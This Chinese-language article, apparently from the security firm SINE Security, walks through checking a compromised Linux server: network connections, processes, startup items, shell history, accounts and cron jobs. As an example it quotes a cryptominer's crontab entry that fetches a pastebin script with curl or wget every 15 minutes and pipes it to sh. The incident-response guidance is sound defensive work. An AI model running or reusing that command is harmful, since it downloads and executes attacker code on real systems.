Linux系統(tǒng)被侵入該怎么處理解決

很多客戶網(wǎng)站服務器被入侵，被攻擊，找到我們SINE安全公司尋求技術支持與幫助，有些網(wǎng)站被篡改，被跳轉，首頁內容被替換，服務器植入木馬后門，服務器卡頓，服務器異常網(wǎng)絡連接，有的客戶使用的是阿里云服務器，經常被提醒服務器有挖礦程序，以及網(wǎng)站被上傳webshell的安全提醒，包括騰訊云提示服務器有木馬文件。

客戶網(wǎng)站被攻擊的第一時間，是需要立即處理的，降損失降到最低，讓網(wǎng)站恢復正常的訪問，由于每個客戶找到我們SINE安全都是比較著急的，安全的處理時間也需要盡快的處理，根據(jù)我們的處理經驗，我們總結了一些服務器被攻擊，被黑的排查辦法，專門用來檢查服務器第一時間的安全問題，看發(fā)生在哪里，服務器是否被黑，是否被攻擊，那些被篡改等等。

首先我們會對當前服務器的IP，以及IP的地址，linux服務器名稱，服務器的版本是centos,還是redhat，服務器的當前時間，進行收集并記錄到一個txt文檔里，接下來再執(zhí)行下一步，對當前服務器的異常網(wǎng)絡連接以及異常的系統(tǒng)進程檢查，主要是通過netstat -an以及-antp命令來檢查服務器存在哪些異常的IP連接。并對連接的IP，進行歸屬地查詢，如果是國外的IP，直接記錄當前進程的PID值，并自動將PID的所有信息記錄，查詢PID所在的linux文件地址，緊接著檢查當前占用CPU大于百分之30的進程，并檢查該進程所在的文件夾。

在我們處理客戶服務器被攻擊的時候發(fā)現(xiàn)很多服務器的命令被篡改，比如正常的PS查看進程的，查詢目錄的 cd的命令都給篡改了，讓服務器無法正常使用命令，檢查服務器安全造成了困擾。對服務器的啟動項進行檢查，有些服務器被植入木馬后門，即使重啟服務器也還是被攻擊，木馬會自動的啟動，檢查linux的init.d的文件夾里是否有多余的啟動文件，也可以檢查時間，來判斷啟動項是否有問題。

再一個要檢查的地方是服務器的歷史命令，history很多服務器被黑都會留下痕跡，比如SSH登錄服務器后，攻擊者對服務器進行了操作，執(zhí)行了那些惡意命令都可以通過history查詢的到，有沒有使用wget命令下載木馬，或者執(zhí)行SH文件。

檢查服務器的所有賬號，以及當前使用并登錄的管理員賬戶，tty是本地用戶登錄，pst是遠程連接的用戶登錄，來排查服務器是否被黑，被攻擊，也可以檢查login.defs文件的uid值，判斷uid的passwd來獲取最近新建的管理員賬戶。執(zhí)行cat etc/passwd命令檢查是否存在異常的用戶賬戶，包括特權賬戶，UID值為0.

最重要的是檢查服務器的定時任務，前段時間某網(wǎng)站客戶中了挖礦病毒，一直占用CPU，查看了定時任務發(fā)現(xiàn)每15分鐘自動執(zhí)行下載命令，crontab -l */15 * * * * (curl -fsSL pastebin/raw/TS4NeUnd||wget -q-O- pastebin/raw/TS4NeUnd)|sh 代碼如上，自動下載并執(zhí)行SH木馬文件。定時任務刪都刪不掉，最后通過檢查系統(tǒng)文件查到了木馬，并終止進程，強制刪除。有些服務器被黑后，請立即檢查2天里被修改的文件，可以通過find命令去檢查所有的文件，看是否有木馬后門文件，如果有可以確定服務器被黑了。

以上就是服務器被入侵攻擊的檢查辦法，通過我們SINE安全給出的檢查步驟，挨個去檢查，就會發(fā)現(xiàn)出問題，最重要的是要檢查日志，對這些日志要仔細的檢查，哪怕一個特征都會導致服務器陷入被黑，被攻擊的狀態(tài)，也希望我們的分享能夠幫助到更多需要幫助的人，服務器安全了，帶來的也是整個互聯(lián)網(wǎng)的安全。